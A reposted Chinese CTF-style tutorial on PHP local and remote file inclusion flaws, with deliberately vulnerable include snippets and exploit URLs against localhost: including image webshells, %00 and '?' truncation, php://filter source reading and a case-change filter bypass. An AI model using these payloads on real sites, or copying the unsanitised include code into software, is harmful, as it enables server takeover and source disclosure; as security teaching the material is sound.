文件包含漏洞之本地包含和远程包含
文件包含漏洞介绍:
成都创新互联技术团队十余年来致力于为客户提供网站制作、网站建设、品牌网站设计、营销型网站、搜索引擎SEO优化等服务。经过多年发展,公司拥有经验丰富的技术团队,先后服务、推广了千余家网站,包括各类中小企业、企事单位、高校等机构单位。
程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件,而无需再次编写,这中文件调用的过程一般被称为文件包含。程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用,但正是由于这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞。几乎所有脚本语言都会提供文件包含的功能,但文件包含漏洞在PHP中居多,而在JSP、ASP、ASP.NET程序中却非常少,甚至没有,这是有些语言设计的弊端。在PHP中经常出现包含漏洞,但这并不意味这其他语言不存在。
漏洞成因:
文件包含漏洞的产生原因是在通过引入文件时,引用的文件名,用户可控,由于传入的文件名没有经过合理的校验,或者校验被绕过,从而操作了预想之外的文件,就 可能导致意外的文件泄露甚至恶意的代码注入。当被包含的文件在服务器本地时,就形成的本地文件包含漏洞,被包涵的文件在第三方服务是,就形成了远程文件包 含漏洞。
漏洞危害:
执行恶意代码、包含恶意文件控制网站、甚至控制网站服务器等。
本地包含漏洞:
代码:
<?PHP
$file=@$_GET['name'];
if($file){
include $file;
}
?>
以以上这个代码为例:
访问:http://127.0.0.1/fileupload/include.php?name=1.txt
txt文件代码为:
<?php phpinfo(); ?>
我们可以看到txt文件里的内容以php文件的方式执行了;如下图所示:
再看,如果访问:http://127.0.0.1/fileupload/include.php?name=2.jpg
2.jpg是一个图片的一句话***;
用菜刀可以直接连接,也就是说不管后缀是什么样,最后都会以php的形式执行。
但是有时候会这样,这个在ISCC国赛中遇到了,就是在最后会自动加入.php,非常烦人。
代码2:
<?php Include $_GET['page'].".php" ?>
执行结果如下图:
如果访问:http://127.0.0.1/fileupload/include2.php?page=1.txt
还是报错。
解决办法:%00截断
利用环境:php版本<5.3magic_quotes_gpc取消的(magic_quotes_gpc = off)
访问:http://127.0.0.1/fileupload/include2.php?page=1.txt%00
远程包含:
远程的文件名不能为php可解析的扩展名(php、php5..),而且php.ini中allow_url_fopen和allow_url_include为On才可以。
访问:http://127.0.0.1/fileupload/include.php?name=http://127.0.0.1/1.txt
如果是遇到这种情况:
可以用“?”或者“%00”阶段;
http://127.0.0.1/fileupload/include2.php?page=http://127.0.0.1/1.txt?
读取源码:php://filter/read=convert.base64-encode/resource=1.txt
http://127.0.0.1/fileupload/include.php?name=php://filter/read=convert.base64-encode/resource=1.txt
读取出来的是base64编码的,进行解码就行了。
php://input的用法
php://input
伪协议绕过大小写:
<?php
if(isset($_GET['f'])){
if(strpos($_GET['f'],"php") !== False){
die("error...");
}
else{
include($_GET['f'] . '.php');
}
}
?>
http://127.0.0.1//index.php?f=pHP://filter/read=convert.base64-encode/resource=index
readfile读取文件,不可以getshell
<?php @readfile($_GET["file"]); ?>
总结:这些在iscc的国赛赛中出现过,如果当时会阶段或者会读取源码,也就能获奖了,学无止境,加油吧。
分享文章:文件包含漏洞之本地包含和远程包含
转载源于:https://www.cdcxhl.com/article24/igooce.html
成都网站建设公司_创新互联,为您提供定制开发、外贸建站、虚拟主机、网站内链、品牌网站设计、网站制作
声明:本网站发布的内容(图片、视频和文字)以用户投稿、用户转载内容为主,如果涉及侵权请尽快告知,我们将会在第一时间删除。文章观点不代表本网站立场,如需处理请联系客服。电话:028-86922220;邮箱:631063699@qq.com。内容未经允许不得转载,或转载时需注明来源: 创新互联
- 动态网站跟静态网站的区别? 2021-07-31
- SEO优化如何处理动态参数? 2015-02-18
- 日照网站制作关于静态网站优于动态网站做seo优化的正确解释 2023-01-09
- 静态和动态网站之间的差异 2019-04-13
- 网站建设的时候应该选择静态页面还是动态页面 2016-10-30
- 网页制作设计趋势是动态的不断变化 2016-09-16
- 网站开发,动态网站效果特点有哪些 2021-09-15
- 动态网站建设的利与弊 2022-05-02
- 动态网站seo优化要怎样做 2013-08-24
- 什么是动态网站制作 2021-10-07
- 企业站使用静态网页还是使用动态网页分析 2016-08-08
- 动态网站与静态网站的区别 2016-11-03